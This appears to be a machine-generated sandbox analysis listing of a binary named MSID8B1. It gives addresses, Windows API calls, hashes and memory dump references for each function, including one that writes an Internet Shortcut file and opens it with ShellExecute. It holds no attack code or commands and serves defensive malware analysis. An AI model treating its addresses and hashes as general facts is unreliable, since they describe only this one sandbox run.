                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00B54E3F,?,20001004,00000000,00000002,?,?,00B54441), ref: 00B576E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 3babc3fb6d9dcca82f5815bd703ea2f4de16bf1b77088812fc70c88ac0ed2b35
                                                                  • Instruction ID: 97c5273caabd8559f3ebfd550b3fa5fb60be09be07715036be867fd19b4ee97a
                                                                  • Opcode Fuzzy Hash: 3babc3fb6d9dcca82f5815bd703ea2f4de16bf1b77088812fc70c88ac0ed2b35
                                                                  • Instruction Fuzzy Hash: FBE04F3268861CBBCF122F61EC08FAE3E66EF45752F104091FC0566160CF768920AAD5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B4353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00B43077), ref: 00B43544
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 2ca8d73ed3f07329e5fdf45bf787c179e57c68db4d3263d918c8a909ef0f0502
                                                                  • Instruction ID: f3b9caef5f2db2e129a8777379a02e8144a43fb2bb12b6113107b6c7e2603784
                                                                  • Opcode Fuzzy Hash: 2ca8d73ed3f07329e5fdf45bf787c179e57c68db4d3263d918c8a909ef0f0502
                                                                  • Instruction Fuzzy Hash:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B22310 Relevance: 1.3, APIs: 1, Instructions: 64memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B42C98: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CA3
                                                                    • Part of subcall function 00B42C98: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CE0
                                                                  • GetProcessHeap.KERNEL32 ref: 00B22365
                                                                    • Part of subcall function 00B42C4E: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C58
                                                                    • Part of subcall function 00B42C4E: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C8B
                                                                    • Part of subcall function 00B42C4E: RtlWakeAllConditionVariable.NTDLL ref: 00B42D02
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                  • String ID:
                                                                  • API String ID: 325507722-0
                                                                  • Opcode ID: 9b921c0a7c79e5a34d224184ca8c4c03ff44c1c4bee2d9e1d21e38a2ffdd7073
                                                                  • Instruction ID: 1557506b53dbdb49484438133a7884d790e36a7fc2746ac9c3586255294d316b
                                                                  • Opcode Fuzzy Hash: 9b921c0a7c79e5a34d224184ca8c4c03ff44c1c4bee2d9e1d21e38a2ffdd7073
                                                                  • Instruction Fuzzy Hash: CA2157B1901200DBE710DF68ED4674977F0EB29B24F1082E9E43D9B2E0DB74DA84DB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B50A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                  • Instruction ID: f0fa725a8f16b914c82db5e32ce0437bc8dd7a07d226460db3cc75805d256ec0
                                                                  • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                  • Instruction Fuzzy Hash: F5328974A0021A8FCB28DF98C991BBEB7F5EF45305F2445E8DD41A7345D632AE4ACB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B592A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b8823f9b6138c4c9ff0f391408e05ba7bac66dc44d118335791298c19cbc698
                                                                  • Instruction ID: 5842b30aed35f87e7903dccb5bdec73d7a6a4a3fba6798123bec498bb7e67c3b
                                                                  • Opcode Fuzzy Hash: 9b8823f9b6138c4c9ff0f391408e05ba7bac66dc44d118335791298c19cbc698
                                                                  • Instruction Fuzzy Hash: 1F32F321D29F418DD7235634DC62339A298AFB73C5F15D767E81AB6AAAEF6884C34100
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B4A915 Relevance: .4, Instructions: 388COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4420db6cdaabf3eab84c2076deb9dd810405238e9baf0b4cda23d510a6ba968c
                                                                  • Instruction ID: 571566cfa7c012e6e25681d3d352553654bd5427784e8a0589722ed1a9039fed
                                                                  • Opcode Fuzzy Hash: 4420db6cdaabf3eab84c2076deb9dd810405238e9baf0b4cda23d510a6ba968c
                                                                  • Instruction Fuzzy Hash: 2BE1CF746806058FCB24CF68C580ABEB7F1FF49310F64869DD5969B691D730EE41EB12
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5D8D5 Relevance: .3, Instructions: 327COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                  • String ID:
                                                                  • API String ID: 3471368781-0
                                                                  • Opcode ID: fab4e9b5d075ae36b33062621be7499090da8794fd02b45c60358bf2250df69c
                                                                  • Instruction ID: 5ca50f3c317b331166fefb7d080e6a8568e6362e83757491649dec6360d19455
                                                                  • Opcode Fuzzy Hash: fab4e9b5d075ae36b33062621be7499090da8794fd02b45c60358bf2250df69c
                                                                  • Instruction Fuzzy Hash: 33B1E5756007018BDB34AF24CC92BB7B3E9EF4430AF5446EDEE86C6580EA75E989C710
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B4C2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                  • Instruction ID: 1eea0207bda22ea850d6118c1893400d868ce5e7ca0bc1e6f7de2c68ac8617ff
                                                                  • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                  • Instruction Fuzzy Hash: 4E517371E01219AFDF54CF99C991AEEBFF1EF88310F198099E815AB201C7349E50DB55
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B44920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction ID: d470a75320b3f868234e02234ac39660a0955c1a92eaec20eb4d7070c578d7ce
                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction Fuzzy Hash: EB1108772011828BD604C62EC4B47B7E3D5EBC632576D43EAD0918B758D322AB65B600
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5AD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                  • Instruction ID: 41ac98f661b1ca6629440fe53147b9cf726d5cc6177c2144863278d426814c2d
                                                                  • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                  • Instruction Fuzzy Hash: 00E08C72A11238EBCB14EB98C914A8AF3FCEB84B02B1505EAF901E3650C270DE04D7D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B52DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                  • Instruction ID: c3f0babf932bddf74b8dcec3b805dc229c6640ffd57e1192474bb11becac73fe
                                                                  • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                  • Instruction Fuzzy Hash: 4AC08C35002E0046CE299A108AB13A833F4F796783F8006ECCC030BAC6C51EBC8FD601
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B40116 Relevance: 30.3, APIs: 20, Instructions: 287COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B4011D
                                                                  • collate.LIBCPMT ref: 00B40126
                                                                    • Part of subcall function 00B3EDF2: __EH_prolog3_GS.LIBCMT ref: 00B3EDF9
                                                                    • Part of subcall function 00B3EDF2: __Getcoll.LIBCPMT ref: 00B3EE5D
                                                                  • __Getcoll.LIBCPMT ref: 00B4016C
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40180
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40195
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B401D3
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B401E6
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B4022C
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40260
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B4031B
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B4032E
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B4034B
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40368
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40385
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B402BD
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • numpunct.LIBCPMT ref: 00B403C4
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B403D4
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40418
                                                                    • Part of subcall function 00B26330: LocalAlloc.KERNELBASE(00000040,?,00B30E04,00000020,?,?,00B29942,00000000,823FDEC6,?,?,?,?,00B650DD,000000FF), ref: 00B26336
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B4042B
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40448
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                  • String ID:
                                                                  • API String ID: 3717464618-0
                                                                  • Opcode ID: e2f44149b0af8edbc2340a605f7fcc44a978e4925b7ec4d6e70696673b2a7dec
                                                                  • Instruction ID: 6fd07e4c275f57f606bae2fc927caf61284a4bb6a2b3ca910dcea861176faa38
                                                                  • Opcode Fuzzy Hash: e2f44149b0af8edbc2340a605f7fcc44a978e4925b7ec4d6e70696673b2a7dec
                                                                  • Instruction Fuzzy Hash: 4D91F871D022216BE720BBB45C46B7F7AF8DF41360F1045EDFA1DAB281DB748A0097A6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B26600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00B2667E
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B266D7
                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B266E2
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B266FE
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00B649E5,000000FF), ref: 00B267DB
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B649E5,000000FF), ref: 00B267E7
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00B649E5), ref: 00B2682F
                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00B649E5,000000FF), ref: 00B2684A
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00B649E5), ref: 00B26867
                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00B649E5,000000FF), ref: 00B26891
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00B268D8
                                                                  • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00B2692A
                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B649E5,000000FF), ref: 00B2695C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                  • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                  • API String ID: 2199533872-3004881174
                                                                  • Opcode ID: 4fcd21025d2615d36abad80a585fdd9518a37852a4b99934cd2020eedd256a3f
                                                                  • Instruction ID: ffe6f690314e8471077797a420dfc936e94b0e925c3727001ccbc7e2c7c5f36f
                                                                  • Opcode Fuzzy Hash: 4fcd21025d2615d36abad80a585fdd9518a37852a4b99934cd2020eedd256a3f
                                                                  • Instruction Fuzzy Hash: C9B10371900268AFEB20DF64EC85BEEBBE4EF05700F1041A9E918AB2D1DB745E04C7A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B42B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00B7DD3C,00000FA0,?,?,00B42B6A), ref: 00B42B98
                                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00B42B6A), ref: 00B42BA3
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00B42B6A), ref: 00B42BB4
                                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B42BC6
                                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B42BD4
                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00B42B6A), ref: 00B42BF7
                                                                  • DeleteCriticalSection.KERNEL32(00B7DD3C,00000007,?,?,00B42B6A), ref: 00B42C13
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00B42B6A), ref: 00B42C23
                                                                  Strings
                                                                  • WakeAllConditionVariable, xrefs: 00B42BCC
                                                                  • kernel32.dll, xrefs: 00B42BAF
                                                                  • SleepConditionVariableCS, xrefs: 00B42BC0
                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B42B9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                  • API String ID: 2565136772-3242537097
                                                                  • Opcode ID: 27db31f21c959c6c1da7cae4db1fbe47a795603bd47b0cbad4eaff4e90f807d6
                                                                  • Instruction ID: e6da331abe524e32809dc51d4d93fa7b3823a405c5a06d3d792fb7a862ece631
                                                                  • Opcode Fuzzy Hash: 27db31f21c959c6c1da7cae4db1fbe47a795603bd47b0cbad4eaff4e90f807d6
                                                                  • Instruction Fuzzy Hash: C901BC71A84711EBD6211F74AC09E1A3BE8DF41B80B1009A1FD09E32F0DEB8C840AAB0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B45CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00B45DAC
                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00B45DCE
                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 00B45EDD
                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00B45FAF
                                                                  • _UnwindNestedFrames.LIBCMT ref: 00B46033
                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00B4604E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 2123188842-393685449
                                                                  • Opcode ID: a5f58050c9823c2535c2995752470fc056aaba0b79eeb71552b8fe44f9125bba
                                                                  • Instruction ID: f23ca927412dc186d24afb761344b4ed158ef76a6d07174d5677848a24304946
                                                                  • Opcode Fuzzy Hash: a5f58050c9823c2535c2995752470fc056aaba0b79eeb71552b8fe44f9125bba
